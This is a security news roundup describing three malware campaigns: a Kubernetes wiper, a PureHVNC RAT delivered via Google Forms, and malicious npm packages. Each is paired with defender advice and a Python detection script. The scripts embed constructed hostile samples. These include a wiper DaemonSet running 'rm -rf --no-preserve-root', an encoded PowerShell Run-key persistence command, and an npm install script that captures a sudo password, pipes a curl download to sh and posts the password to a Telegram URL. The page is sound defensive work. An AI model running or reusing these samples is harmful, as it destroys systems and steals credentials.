Trending Topics
TeamPCP Deploys Iran-Targeted Wiper in Kubernetes Attacks
A newly observed campaign by TeamPCP is targeting Kubernetes clusters with a destructive malware variant that wipes systems configured for Iran while maintaining persistence everywhere else. The operation builds directly on the earlier CanisterWorm activity, reusing the same ICP-based command-and-control (C2) infrastructure, backdoor logic, and /tmp/pglog drop path, but adds a geopolitically targeted payload. When the malware detects an Iranian timezone and locale, it deploys a Kubernetes DaemonSet named “Host-provisioner-iran” that mounts the host filesystem into a “kamikaze” container, which deletes every top-level directory and then forces a reboot; because a DaemonSet schedules a pod on every node, a single API call is enough to wipe the whole cluster. If Kubernetes is not present, the malware runs rm -rf / --no-preserve-root directly, attempting passwordless sudo if it is not already root. In non-Iranian environments it instead deploys a DaemonSet that installs a persistent Python backdoor as a systemd service on each node, ensuring continued access cluster-wide. Earlier variants moved laterally only through Kubernetes-native DaemonSets; newer samples add SSH-based propagation, harvesting private keys and parsing authentication logs to identify usable accounts and reachable hosts for lateral access. The malware also abuses exposed Docker APIs, launching privileged Alpine containers with the full host filesystem mounted in order to execute its payload. These behaviours leave observable indicators: outbound SSH connections made with host key checking disabled, and traffic to TCP port 2375 (the default unauthenticated Docker API port) across local networks. Together these techniques let the malware operate across both containerized and traditional infrastructure, and, combined with its reuse of established C2 infrastructure and adaptive deployment, they mark a mature threat actor that blends persistence, automation, and targeted destruction against cloud-native and hybrid environments.
Organizations should restrict access to Kubernetes APIs and Docker daemons (never expose the unauthenticated TCP 2375 endpoint), enforce strong authentication (no passwordless sudo, no unprotected SSH private keys on hosts), and monitor for anomalous DaemonSet deployments, in particular ones whose pods run privileged containers with hostPath / mounted read-write, as well as for unexpected outbound SSH activity, to prevent unauthorized lateral movement and destructive payload execution.
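The monitoring recommendation above is easiest to act on if the DaemonSet review is automated. The script below is an added example for this page, not TeamPCP tooling or any vendor's detection content: it scores DaemonSet objects on exactly the traits the write-up describes (hostPath "/" mounted read-write, a privileged container, hostPID, and a destructive command line). Both manifests are constructed for illustration, not captured samples, and the name of the malicious one is deliberately chosen to mirror the text.

```python
"""Triage Kubernetes DaemonSet manifests for the host-takeover pattern
described above: hostPath "/" mounted read-write into a privileged
container, hostPID, and a destructive command line.
Added example for this page, not TeamPCP or vendor code; the two
manifests below are constructed, not captured samples."""
from typing import Any

# Constructed, pared-down DaemonSet objects in the shape the Kubernetes API returns.
SAMPLE_DAEMONSETS: list[dict[str, Any]] = [
    {   # Constructed imitation of the destructive DaemonSet the text describes.
        "metadata": {"name": "host-provisioner-iran", "namespace": "kube-system"},
        "spec": {"template": {"spec": {
            "hostPID": True,
            "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
            "containers": [{
                "name": "kamikaze",
                "image": "alpine:latest",
                "securityContext": {"privileged": True},
                "command": ["sh", "-c", "rm -rf /host/* --no-preserve-root; reboot -f"],
                "volumeMounts": [{"name": "host", "mountPath": "/host"}],
            }],
        }}},
    },
    {   # Constructed benign monitoring agent: hostPath, but /proc, read-only, unprivileged.
        "metadata": {"name": "node-exporter", "namespace": "monitoring"},
        "spec": {"template": {"spec": {
            "volumes": [{"name": "proc", "hostPath": {"path": "/proc"}}],
            "containers": [{
                "name": "exporter",
                "image": "prom/node-exporter:v1.8.0",
                "args": ["--path.procfs=/host/proc"],
                "volumeMounts": [{"name": "proc", "mountPath": "/host/proc",
                                  "readOnly": True}],
            }],
        }}},
    },
]

# Command-line fragments that have no business in a node-level agent (illustrative list).
DESTRUCTIVE_TOKENS = ("rm -rf", "--no-preserve-root", "reboot", "mkfs", "dd if=")


def triage_daemonset(ds: dict[str, Any]) -> tuple[str, list[str]]:
    """Return (severity, findings) for one DaemonSet object."""
    pod = ds["spec"]["template"]["spec"]
    findings: list[str] = []

    host_paths = {v["name"]: v["hostPath"]["path"]
                  for v in pod.get("volumes", []) if "hostPath" in v}
    root_volumes = {n for n, p in host_paths.items() if p == "/"}
    if host_paths:
        findings.append("hostPath volumes: " + ", ".join(sorted(host_paths.values())))
    if pod.get("hostPID"):
        findings.append("hostPID enabled")

    privileged = root_rw = destructive = False
    for c in pod.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            privileged = True
            findings.append(f"container {c['name']} is privileged")
        for m in c.get("volumeMounts", []):
            if m["name"] in root_volumes and not m.get("readOnly", False):
                root_rw = True
                findings.append(f"container {c['name']} mounts host root read-write at {m['mountPath']}")
        # Destructive intent is usually visible in command/args, as in the text's rm -rf wipe.
        cmdline = " ".join(c.get("command", []) + c.get("args", []))
        hits = [t for t in DESTRUCTIVE_TOKENS if t in cmdline]
        if hits:
            destructive = True
            findings.append(f"container {c['name']} command contains {hits}")

    if destructive:
        severity = "critical"
    elif root_rw or (privileged and root_volumes):
        severity = "high"
    elif privileged or pod.get("hostPID") or root_volumes:
        severity = "medium"
    else:
        severity = "low"
    return severity, findings


def triage_all(daemonsets: list[dict[str, Any]]) -> dict[str, str]:
    """Map 'namespace/name' to severity so a scheduled job can alert on high/critical."""
    return {f"{ds['metadata']['namespace']}/{ds['metadata']['name']}": triage_daemonset(ds)[0]
            for ds in daemonsets}


if __name__ == "__main__":
    for ds in SAMPLE_DAEMONSETS:
        sev, notes = triage_daemonset(ds)
        print(f"{ds['metadata']['name']}: {sev}")
        for n in notes:
            print("  -", n)
```

In a live cluster, feed the `.items` array of `kubectl get daemonsets -A -o json` to `triage_all` on a schedule and alert on anything scored high or critical; a DaemonSet that mounts the host root read-write into a privileged container is rare enough in most environments that the high bucket alone is worth a page.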
Google Forms Abuse Delivers PureHVNC RAT via Business-Themed Lures
A newly observed campaign is leveraging trusted platforms like Google Forms and LinkedIn to distribute the PureHVNC Remote Access Trojan (RAT), shifting initial access away from traditional phishing emails to more credible business workflows. Attackers create convincing forms impersonating legitimate companies and prompt victims to download business-themed ZIP files tied to job interviews, project briefs, or financial documents. These archives, often hosted on services like Dropbox or hidden behind URL shorteners, contain a mix of legitimate-looking PDFs and malicious executables paired with DLLs such as msimg32[.]dll; the executable loads the DLL from its own directory in preference to the system copy, so the infection starts through DLL search-order hijacking. Once executed, the malware runs a multi-stage infection chain that includes anti-analysis checks, self-deletion, and the launch of decoy documents to avoid suspicion. It then extracts additional payloads into ProgramData directories and executes obfuscated Python scripts that ultimately deploy shellcode. The final stage injects PureHVNC into legitimate processes like SearchUI.exe, granting attackers full remote control and enabling extensive data exfiltration. Beyond initial compromise, the malware establishes strong persistence and surveillance capabilities, making it effective for long-term access and data theft. It creates registry-based persistence and scheduled tasks using encoded PowerShell commands, often with elevated privileges, so that it survives reboots and stays hidden from casual inspection. PureHVNC collects detailed system information via WMI queries and targets sensitive data from browsers, browser extensions, cryptocurrency wallets, and applications such as Telegram and Foxmail. Its modular architecture allows attackers to deploy additional plugins, expanding functionality based on operational needs.
Users should avoid downloading files from unsolicited Google Forms or business requests, verify opportunities through official company channels, and block execution of untrusted archives to reduce the risk of multi-stage RAT infections.
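Two of the stages described above can be checked mechanically: the lure archive's layout (an EXE shipped with a DLL in the same folder, which is what search-order hijacking needs) and the encoded PowerShell behind the scheduled-task and Run-key persistence. The following is an added example for this page, not the threat actor's code or any vendor's detection content. The ZIP and the command line it inspects are constructed; the list of DLL names is an illustrative set of loader names commonly dropped next to a legitimate executable, with msimg32.dll being the one the write-up names.

```python
"""Two checks for the PureHVNC delivery and persistence stages described
above: (1) an EXE shipped alongside a DLL inside a lure archive, and
(2) decoding -EncodedCommand PowerShell used for Run-key / task persistence.
Added example for this page, not the actor's or any vendor's code.
The archive and command line below are constructed, not captured samples."""
import base64
import io
import zipfile
from pathlib import PurePosixPath
from typing import Any, Optional

# Illustrative DLL names commonly placed next to a legitimate EXE for sideloading.
SIDELOAD_DLLS = {"msimg32.dll", "version.dll", "dbghelp.dll", "wtsapi32.dll", "userenv.dll"}


def build_sample_archive() -> bytes:
    """Constructed lure ZIP: decoy PDF, executable, and a DLL sharing its folder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Project_Brief/Project Brief.pdf", b"%PDF-1.4 decoy")
        zf.writestr("Project_Brief/ProjectBrief.exe", b"MZ" + b"\0" * 64)
        zf.writestr("Project_Brief/msimg32.dll", b"MZ" + b"\0" * 64)
    return buf.getvalue()


def find_sideload_pairs(zip_bytes: bytes) -> list[dict[str, Any]]:
    """Flag every EXE that has a DLL in the same directory of the archive."""
    names = zipfile.ZipFile(io.BytesIO(zip_bytes)).namelist()
    by_dir: dict[str, list[str]] = {}
    for n in names:
        p = PurePosixPath(n)
        by_dir.setdefault(str(p.parent), []).append(p.name)
    pairs = []
    for d, files in by_dir.items():
        exes = [f for f in files if f.lower().endswith(".exe")]
        dlls = [f for f in files if f.lower().endswith(".dll")]
        for exe in exes:
            for dll in dlls:
                pairs.append({"dir": d, "exe": exe, "dll": dll,
                              "known_sideload_name": dll.lower() in SIDELOAD_DLLS})
    return pairs


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (any prefix such as -e or -enc),
    or None. PowerShell expects base64 of UTF-16LE text, not UTF-8."""
    tokens = cmdline.split()
    for i, t in enumerate(tokens[:-1]):
        if t[0] not in "-/":
            continue
        flag = t.lstrip("-/").lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


# Substrings (lower-cased) that point at the persistence tricks the text describes.
PERSISTENCE_MARKERS = {
    "run_key": "\\currentversion\\run",
    "scheduled_task": "register-scheduledtask",
    "programdata_path": "\\programdata\\",
    "hidden_window": "-w hidden",
}


def triage_powershell(cmdline: str) -> dict[str, Any]:
    """Decode the command and tag persistence indicators in script and launcher flags."""
    script = decode_encoded_powershell(cmdline)
    haystack = (cmdline + " " + (script or "")).lower().replace("-windowstyle hidden", "-w hidden")
    return {"decoded": script,
            "indicators": [k for k, v in PERSISTENCE_MARKERS.items() if v in haystack]}


# Constructed persistence command: Run-key entry pointing into ProgramData.
SAMPLE_SCRIPT = ("New-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
                 "-Name 'Updater' -Value 'C:\\ProgramData\\svc\\svc.exe' -PropertyType String -Force")
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"))

if __name__ == "__main__":
    print(find_sideload_pairs(build_sample_archive()))
    print(triage_powershell(SAMPLE_CMDLINE))
```

Scheduled-task actions and Run-key values can be pulled from `schtasks /query /v /fo csv` output or an EDR process-creation feed and pushed through `triage_powershell`; the UTF-16LE detail matters because decoding the base64 as UTF-8 yields unreadable text and hides the registry path the analyst is looking for.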
Ghost Campaign Uses Malicious npm Packages to Steal Crypto Wallets
A newly identified “Ghost” campaign is leveraging malicious npm packages to compromise developers by disguising malware within seemingly legitimate libraries. The operation involves multiple packages published from a single npm account, which present as developer utilities but execute malicious code in their install-time lifecycle scripts. Instead of relying solely on a sophisticated payload, the campaign’s key innovation is fake npm install output that mimics a legitimate installation, complete with progress bars and deliberate delays, to avoid suspicion. During this staged output, victims are prompted to enter their sudo password under the pretense of resolving an installation issue, effectively handing over elevated access. Once the password is captured, the malware silently downloads and decrypts a second-stage payload from infrastructure hosted on Telegram or web3-based platforms. The final stage deploys a remote access trojan (RAT) capable of stealing cryptocurrency wallets and other sensitive data and executing commands from a command-and-control server. Beyond initial compromise, the campaign demonstrates a broader evolution in software supply chain attacks, combining social engineering with trusted development workflows to maximize effectiveness. The malicious packages introduce randomized delays, misleading error messages, and fake dependency installations to create a convincing experience that blends into routine developer activity. In parallel, the attackers also use GitHub repositories and AI-assisted workflows to distribute similar payloads, further expanding their reach and credibility within developer ecosystems. Once deployed, the malware harvests a wide range of sensitive data, including browser credentials, SSH keys, cloud configurations, and cryptocurrency wallets, and often exfiltrates it via Telegram-based infrastructure.
Developers should only install packages from verified publishers, treat any password prompt during npm install as a red flag (npm itself never asks for a sudo password, so enter one only after validating the specific package and script that is asking), run installs with --ignore-scripts where the workflow allows it, and implement dependency scanning and monitoring to detect malicious lifecycle scripts and anomalous install-time behavior.
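The dependency-scanning recommendation can be made concrete by inspecting lifecycle scripts before they run. The scanner below is an added example for this page, not the researchers' tooling or the campaign's code: it reads the preinstall/install/postinstall/prepare hooks of a package, follows `node`/`sh` references to local script files, and tags the install-time tricks the write-up describes (fake npm output, a password prompt, a sudo invocation, a Telegram endpoint, a download piped to a shell). The two packages and the script body are constructed for illustration; the regex list is illustrative rather than exhaustive.

```python
"""Scan npm packages for "Ghost"-style install-time tricks described above:
lifecycle scripts whose code prompts for a sudo password, fakes installer
output, or reaches out to Telegram or a raw script download.
Added example for this page, not the researchers' tooling; the packages
and script contents below are constructed, not real samples."""
import json
import re
from pathlib import Path
from typing import Any, Optional

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# (tag, regex, severity) - illustrative list, not exhaustive.
PATTERNS = [
    ("sudo_invocation", re.compile(r"\bsudo\b"), "high"),
    ("password_prompt", re.compile(r"password\s*[:>]|process\.stdin", re.I), "high"),
    ("telegram_c2", re.compile(r"api\.telegram\.org|\bt\.me/", re.I), "high"),
    ("pipe_to_shell", re.compile(r"(curl|wget)[^|\n]*\|\s*(ba)?sh\b"), "high"),
    ("dynamic_eval", re.compile(r"\beval\(|new Function\(|Buffer\.from\([^)]*base64", re.I), "medium"),
    ("fake_npm_output", re.compile(r"npm (WARN|notice|info)|added \d+ packages", re.I), "medium"),
    ("spawns_processes", re.compile(r"child_process|execSync|spawnSync"), "low"),
]
SEVERITY_RANK = {"none": 0, "info": 1, "low": 2, "medium": 3, "high": 4}


def _referenced_files(command: str, files: dict[str, str]) -> list[str]:
    """Contents of local scripts a lifecycle command invokes (node x.js, sh x.sh)."""
    out = []
    for m in re.finditer(r"(?:node|sh|bash)\s+([\w./-]+)", command):
        path = m.group(1).lstrip("./")
        if path in files:
            out.append(files[path])
    return out


def scan_package(pkg: dict[str, Any], files: Optional[dict[str, str]] = None) -> dict[str, Any]:
    """Return {'name', 'severity', 'findings'} for one package.json plus its local files."""
    files = files or {}
    findings: list[str] = []
    severity = "none"
    for hook in LIFECYCLE_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if not cmd:
            continue
        findings.append(f"{hook}: {cmd}")           # any lifecycle hook is worth a look
        severity = max(severity, "info", key=SEVERITY_RANK.get)
        for text in [cmd] + _referenced_files(cmd, files):
            for tag, rx, sev in PATTERNS:
                if rx.search(text) and f"{hook} -> {tag}" not in findings:
                    findings.append(f"{hook} -> {tag}")
                    severity = max(severity, sev, key=SEVERITY_RANK.get)
    return {"name": pkg.get("name", "?"), "severity": severity, "findings": findings}


def scan_node_modules(root: str) -> list[dict[str, Any]]:
    """Walk an installed tree and scan every package.json with its sibling script files."""
    results = []
    for pj in Path(root).rglob("package.json"):
        files = {str(p.relative_to(pj.parent)).replace("\\", "/"): p.read_text(errors="replace")
                 for p in pj.parent.rglob("*")
                 if p.is_file() and p.suffix in (".js", ".cjs", ".mjs", ".sh")}
        results.append(scan_package(json.loads(pj.read_text()), files))
    return results


# Constructed packages: one mimicking the campaign, one with a normal prepare hook, one clean.
MALICIOUS_PKG = {"name": "dev-utils-cli-helper", "version": "1.0.3",
                 "scripts": {"postinstall": "node scripts/setup.js"}}
MALICIOUS_FILES = {"scripts/setup.js": r"""
const { execSync } = require('child_process');
const rl = require('readline').createInterface({ input: process.stdin, output: process.stdout });
// Constructed sample: fake installer output so the pause and the prompt look like npm's own.
console.log('npm WARN deprecated core-js@2.6.12: core-js@<3.23.3 is no longer maintained');
console.log('[##########----------] 50% | building native deps...');
rl.question('Permission denied. Password: ', pw => {
  execSync(`echo '${pw}' | sudo -S sh -c "curl -s https://example.invalid/s.sh | sh"`);
  fetch('https://api.telegram.org/botPLACEHOLDER/sendMessage?text=' + encodeURIComponent(pw));
});
"""}
PREPARE_PKG = {"name": "my-lib", "version": "0.4.0", "scripts": {"prepare": "tsc -p ."}}
BENIGN_PKG = {"name": "tiny-date-utils", "version": "2.1.0",
              "scripts": {"build": "tsc -p .", "test": "vitest"}}

if __name__ == "__main__":
    for pkg, files in ((MALICIOUS_PKG, MALICIOUS_FILES), (PREPARE_PKG, None), (BENIGN_PKG, None)):
        print(scan_package(pkg, files))
```

Run `scan_node_modules("node_modules")` after an `npm install --ignore-scripts` and review anything above "info" before allowing scripts to execute; that ordering means the fake install log and the password prompt never get a chance to run during the initial fetch.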
Written By: William Elchert